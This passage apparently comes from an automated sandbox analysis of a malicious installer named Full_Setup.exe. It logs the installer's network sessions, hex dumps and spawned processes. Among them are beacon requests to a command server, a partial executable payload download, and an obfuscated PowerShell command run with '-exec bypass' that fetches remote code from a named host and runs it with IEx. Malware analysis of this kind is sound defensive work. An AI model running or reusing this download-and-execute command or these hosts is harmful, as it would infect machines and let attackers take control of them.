d7 f5 26 b2 03 e2 37 ad 74 db b3 19 52 9c ab 06 d4 6b 6d 84 ae 1e b6 c7 51 ac ae c2 65 55 3d 70 49 bb 30 6d 30 59 75 9c Data Ascii: /fMU(u@hy6[{r\|A:o!f=U-TvA:GdF5#6B?B SS`b=^ZV}aQawm#nZW0+.n^n?Ngto9vTJ]fyuJenGy&7tRkmQeU=pI0m0Yu
2025-01-05 16:48:24 UTC	15331	OUT	Data Raw: af e6 d6 db f3 01 1d d1 82 6f 8c 97 07 47 e4 c0 3b 19 3d 24 78 da 27 9a 6e 1e f2 63 bb 65 7f b2 c9 d5 ad 1f cf 84 35 c0 c9 75 3b 75 fe cf 00 c7 d5 4a 58 22 ae 90 17 e8 ac dd f6 ba 75 d7 f9 28 f5 07 12 ed 57 7b eb 5d 92 1c f8 2d 77 4a 17 f7 bc 4e 1c c2 71 55 02 aa a4 6f 7e 54 49 78 8b 21 da d6 a0 b0 83 ca bb d1 c7 f6 1a c1 8e 90 6c 15 38 5c 7f 3d 2d cc 4d a5 71 b7 09 ef e9 d1 77 9d f8 bc a8 a1 98 f9 ab 66 69 1d e2 b7 88 42 9f 1d a8 5d c9 a1 03 77 e4 36 ec af ad 7d 14 c1 73 5f d0 45 69 18 c3 43 82 4a 8a 09 96 d9 82 af 8f 6a 7d 8a 7e b3 c9 3e 52 ec 01 65 3b 79 a9 4b 7b 51 29 2e d8 b9 f1 62 e1 bb ce cd 91 bc 2c 0c c7 cd 4c 7a 1a 03 e1 e6 5c 9b b1 e3 6b 6f 6b a2 8f 60 f5 5b b9 9d 4e 06 8a 6b b5 71 a4 2a 3e 7c 62 b0 86 5e 9b d8 1c 8d 30 6c f2 37 8b e0 5d 5d 91 Data Ascii: oG;=$x'nce5u;uJX"u(W{]-wJNqUo~TIx!l8\=-MqwfiB]w6}s_EiCJj}~>Re;yK{Q).b,Lz\kok`[Nkq*>\|b^0l7]]
2025-01-05 16:48:26 UTC	1135	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 16:48:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=oaetpr6dmdcp50rebv5j4shr7a; expires=Thu, 01 May 2025 10:35:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wfRbpShveR1K1P5ioKV5Lj42sxmHdwcJrBRLjXKoFa2qcIb0NzEr9VQnLdZxduyVx0XWA7YP%2F2iLLVY88BlFFwRE6qp0vCopowzWeyA4bCmX2wmskUd0UlOJjs3%2B1GCBafYoEQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd4f4abae5942f1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2180&min_rtt=2175&rtt_var=826&sent=197&recv=589&lost=0&retrans=0&sent_bytes=2843&recv_bytes=571459&delivery_rate=1315908&cwnd=210&unsent_bytes=0&cid=ac063e42b00f3a6b&ts=1648&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49757	172.67.196.191	443	7048	C:\Users\user\Desktop\Full_Setup.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 16:48:26 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 113 Host: aloofysofar.click
2025-01-05 16:48:26 UTC	113	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 35 46 46 44 44 34 31 41 34 33 44 45 31 46 36 37 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--ZINA&j=637b55279021aab33278188cfa638397&hwid=5FFDD41A43DE1F6709E39FEBDE2EA801
2025-01-05 16:48:27 UTC	1127	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 16:48:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2u2a3ii2ab1vr1puluf3nb86u4; expires=Thu, 01 May 2025 10:35:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x51vAhhyAoQYTIww5O94niwBpxOutg1LmgVQN70m0j7XWN4v4cYwkxCaUo7F8z0yaj7OWqaPd1yf%2B%2B5PElhFM40Zk4YtdflYy9zWmoEEPmM9E3oqxU3TMMmHKWaBNJQypCr6qg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd4f4b9398c5e80-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1668&rtt_var=834&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4226&recv_bytes=1015&delivery_rate=309617&cwnd=218&unsent_bytes=0&cid=85f88651ec37ec78&ts=451&x=0"
2025-01-05 16:48:27 UTC	218	IN	Data Raw: 64 34 0d 0a 77 59 35 41 6c 30 7a 55 42 69 39 68 50 6e 6e 2f 47 4e 51 48 47 77 78 30 64 38 78 45 33 59 42 72 36 54 79 47 4f 76 53 30 4b 36 4f 61 39 57 4c 69 62 75 34 6b 52 78 56 4b 43 59 77 69 69 43 68 48 49 78 63 53 71 7a 48 7a 38 77 4f 47 54 4e 6f 56 7a 49 45 63 6c 2f 4f 34 63 71 4e 34 34 6c 6f 41 45 56 5a 58 69 32 43 67 4a 54 63 75 45 67 50 75 66 75 2b 73 53 59 77 65 76 41 75 4a 6d 46 43 42 74 4b 78 36 74 53 53 67 63 6c 38 53 42 43 58 51 52 50 74 73 64 32 55 45 41 62 6b 70 74 50 4d 65 67 42 4c 31 55 70 76 45 64 34 79 6f 34 44 54 49 4c 37 68 32 63 42 4a 57 47 4e 46 73 72 48 4d 35 49 46 59 52 75 47 62 6e 73 45 66 4c 57 61 51 41 78 4d 6c 32 0d 0a Data Ascii: d4wY5Al0zUBi9hPnn/GNQHGwx0d8xE3YBr6TyGOvS0K6Oa9WLibu4kRxVKCYwiiChHIxcSqzHz8wOGTNoVzIEcl/O4cqN44loAEVZXi2CgJTcuEgPufu+sSYwevAuJmFCBtKx6tSSgcl8SBCXQRPtsd2UEAbkptPMegBL1UpvEd4yo4DTIL7h2cBJWGNFsrHM5IFYRuGbnsEfLWaQAxMl2
2025-01-05 16:48:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49758	185.161.251.21	443	7048	C:\Users\user\Desktop\Full_Setup.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 16:48:28 UTC	201	OUT	GET /8574262446/ph.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: cegu.shop
2025-01-05 16:48:28 UTC	249	IN	HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Sun, 05 Jan 2025 16:48:28 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 329 Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT Connection: close ETag: "676c9e2a-149" Accept-Ranges: bytes
2025-01-05 16:48:28 UTC	329	IN	Data Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49759	104.21.37.128	443	7048	C:\Users\user\Desktop\Full_Setup.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 16:48:29 UTC	206	OUT	GET /int_clp_sha.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: klipvumisui.shop
2025-01-05 16:48:29 UTC	907	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 16:48:29 GMT Content-Type: text/plain Content-Length: 8767044 Connection: close Accept-Ranges: bytes ETag: "51f99eddd33cc04fb0f55f873b76d907" Last-Modified: Sat, 28 Dec 2024 20:49:42 GMT Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cv4qPwre1b4R77BBLFvNrqDq%2B6F4Lik4UyRcmO%2BSCNAFDc%2BTkrdyJ6MGRYcwv9ZV%2F3I6fPgfsziaNRDd%2FLySCjJV1gSVPQBB7dRemqUkoENbQF6uFIuzO2Pay458fLS4m6%2FJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd4f4c5fc6772a1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2038&min_rtt=2037&rtt_var=767&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2868&recv_bytes=820&delivery_rate=1424390&cwnd=194&unsent_bytes=0&cid=903e925b74c2c22e&ts=283&x=0"
2025-01-05 16:48:29 UTC	462	IN	Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7
2025-01-05 16:48:29 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 Data Ascii: R\`.textVX `.itextdp\ `.data88:x@.bssXr.idataP@.didata
2025-01-05 16:48:29 UTC	1369	IN	Data Raw: 00 2c 13 40 00 01 07 48 52 45 53 55 4c 54 04 00 00 00 80 ff ff ff 7f 02 00 44 13 40 00 0e 05 54 47 55 49 44 10 00 00 00 00 00 00 00 00 04 00 00 00 e4 10 40 00 00 00 00 00 02 02 44 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 06 00 0b 40 76 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 28 9c 4a 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 28 9c 4a 00 06 43 72 65 61 74 65 00 00 40 13 40 00 02 02 Data Ascii: ,@HRESULTD@TGUID@D1@D2@D3D4@v@&op_Equality@@@Left@@Right(J&op_Inequality@@@Left@@Right(JEmpty@@(JCreate@@
2025-01-05 16:48:29 UTC	1369	IN	Data Raw: 46 1f 40 00 4a 00 fe ff 72 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 7d 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 7d 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 44 69 73 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 7d 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 94 7e 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a Data Ascii: F@Jr@MTObject&}@Create@Self$}@Free@Self)(JDisposeOf@Self>}@InitInstance@Self@Instance/~@CleanupInstance@Self)(J
2025-01-05 16:48:29 UTC	1369	IN	Data Raw: 40 b8 12 40 00 01 00 01 01 02 00 02 00 5b 00 e8 80 40 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 28 13 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 08 9c 1f 40 00 01 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 00 11 40 00 02 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 31 00 08 81 40 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 0c 81 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 10 81 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 Data Ascii: @@[@SafeCallException(@@Self@ExceptObject@ExceptAddr1@AfterConstruction@Self1@BeforeDestruction@Self9@Dispatch@SelfMessage
2025-01-05 16:48:29 UTC	1369	IN	Data Raw: 65 6c 66 02 00 02 9c 10 40 00 02 00 05 41 46 6c 61 67 02 00 02 b8 12 40 00 08 00 05 41 44 61 74 61 02 00 02 00 00 5c 23 40 00 07 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 b8 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 8c 23 40 00 14 08 50 4d 6f 6e 69 74 6f 72 8c 24 40 00 02 00 a0 23 40 00 14 17 54 4d 6f 6e 69 74 6f 72 2e 50 57 61 69 74 69 6e 67 54 68 72 65 61 64 c0 23 40 00 02 00 00 c4 23 40 00 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 9c 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 2c 24 40 00 0e 12 54 4d 6f Data Ascii: elf@AFlag@AData\#@HPPGENAttribute"@4 @System#@PMonitor$@#@TMonitor.PWaitingThread#@#@TMonitor.TWaitingThread#@Next@Thread@WaitEvent,$@TMo
2025-01-05 16:48:29 UTC	1369	IN	Data Raw: 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 ec f1 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 2b 00 00 f2 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 14 29 40 00 07 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 2c 28 40 00 9c 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 47 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 f1 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 cc 83 44 24 04 fc e9 21 c9 00 00 83 44 24 04 fc e9 3f c9 00 00 83 44 24 04 fc e9 41 c9 00 Data Ascii: fterConstruction)@Self1@BeforeDestruction)@Self+@NewInstance@Self)@TInterfacedObject,(@@SystemG)@@@RefCountD$!D$?D$A
2025-01-05 16:48:29 UTC	1369	IN	Data Raw: 40 00 08 00 00 00 02 08 56 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 10 40 00 08 00 00 00 02 09 56 53 68 6f 72 74 49 6e 74 02 00 b4 10 40 00 08 00 00 00 02 05 56 42 79 74 65 02 00 cc 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 07 56 55 49 6e 74 33 32 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 00 11 40 00 08 00 00 00 02 07 56 53 74 72 69 6e 67 02 00 00 11 40 00 08 00 00 00 02 04 56 41 6e 79 02 00 d4 2b 40 00 08 00 00 00 02 06 56 41 72 72 61 79 02 00 00 11 40 00 08 00 00 00 02 08 56 50 6f 69 6e 74 65 72 02 00 00 11 40 00 08 00 00 00 02 08 56 55 Data Ascii: @VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@VU
2025-01-05 16:48:29 UTC	1369	IN	Data Raw: 35 40 00 08 00 00 00 24 17 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d 40 00 Data Ascii: 5@$@~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=@
2025-01-05 16:48:29 UTC	1369	IN	Data Raw: 72 63 02 00 01 04 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c Data Ascii: rcL@Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb(

Target ID:	0
Start time:	11:48:00
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\Full_Setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Full_Setup.exe"
Imagebase:	0x400000
File size:	75'917'732 bytes
MD5 hash:	7D0C49430B8EEC968A41DD052D0830F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2020014430.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:48:27
Start date:	05/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z
Imagebase:	0x2f0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:48:27
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:48:35
Start date:	05/01/2025
Path:	C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe"
Imagebase:	0x720000
File size:	8'767'044 bytes
MD5 hash:	51F99EDDD33CC04FB0F55F873B76D907
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 74%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:48:37
Start date:	05/01/2025
Path:	C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp" /SL5="$2042E,7785838,845824,C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe"
Imagebase:	0x90000
File size:	3'367'424 bytes
MD5 hash:	F809F51E678B7F2E388F8C969EF902C8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:48:38
Start date:	05/01/2025
Path:	C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe" /VERYSILENT
Imagebase:	0x720000
File size:	8'767'044 bytes
MD5 hash:	51F99EDDD33CC04FB0F55F873B76D907
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:48:38
Start date:	05/01/2025
Path:	C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp" /SL5="$90296,7785838,845824,C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe" /VERYSILENT
Imagebase:	0x4e0000
File size:	3'367'424 bytes
MD5 hash:	F809F51E678B7F2E388F8C969EF902C8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:49:05
Start date:	05/01/2025
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	"timeout" 9
Imagebase:	0x7ff7b0c20000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:49:05
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
